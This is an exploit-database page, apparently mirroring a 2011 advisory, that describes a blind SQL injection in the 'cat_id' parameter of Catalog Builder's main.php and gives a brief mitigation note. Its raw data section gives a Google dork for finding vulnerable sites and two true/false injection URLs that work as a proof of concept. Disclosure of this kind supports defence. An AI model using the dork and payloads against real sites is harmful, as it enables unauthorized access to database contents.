header-logo
Suggest Exploit
vendor:
Ecommerce Software
by:
takeshix
7.5
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: Ecommerce Software
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Fedora
2011

Catalog Builder – Ecommerce Software – Blind SQL Injection Vulnerability

Catalog Builder is vulnerable to Blind SQL Injection. The vulnerability exists in the 'cat_id' parameter of the 'main.php' script. An attacker can inject malicious SQL queries in the 'cat_id' parameter and execute them in the backend database. This can be exploited to gain access to sensitive information from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

+------------------------------------------------------------------------------------------+
|-------[ Catalog Builder - Ecommerce Software - Blind SQL Injection Vulnerability ]-------|
+------------------------------------------------------------------------------------------+
[+] Google Dork hint: inurl:'/catalog/main.php?cat_id='
[+] Date: 16.06.2011
[+] Author: takeshix
[+] Author Contact: takeshix.query@googlemail.com
[+] Software Link: http://www.catalogbuilder.ca/catalog/main.php
[+] Tested on: Fedora
[+] Platform: PHP
--------------------------------------------------------------------------------------------

vulnerable url:

/catalog/main.php?cat_id=[blind sqli]

example:

http://localhost/catalog/main.php?cat_id=1' AND 1337=1337 AND 'takeshix'='takeshix true
http://localhost/catalog/main.php?cat_id=1' AND 1337=1337 AND 'takeshix'='takeshixx false
	

--------------------------------------------------------------------------------------------
[+] Greez to some members of UNITS & hackademics & DSU
+------------------------------------------------------------------------------------------+
|-------------------------------------[ hacktivistas ]-------------------------------------|
+------------------------------------------------------------------------------------------+

Navigation

Suggest Exploit

Services By CQR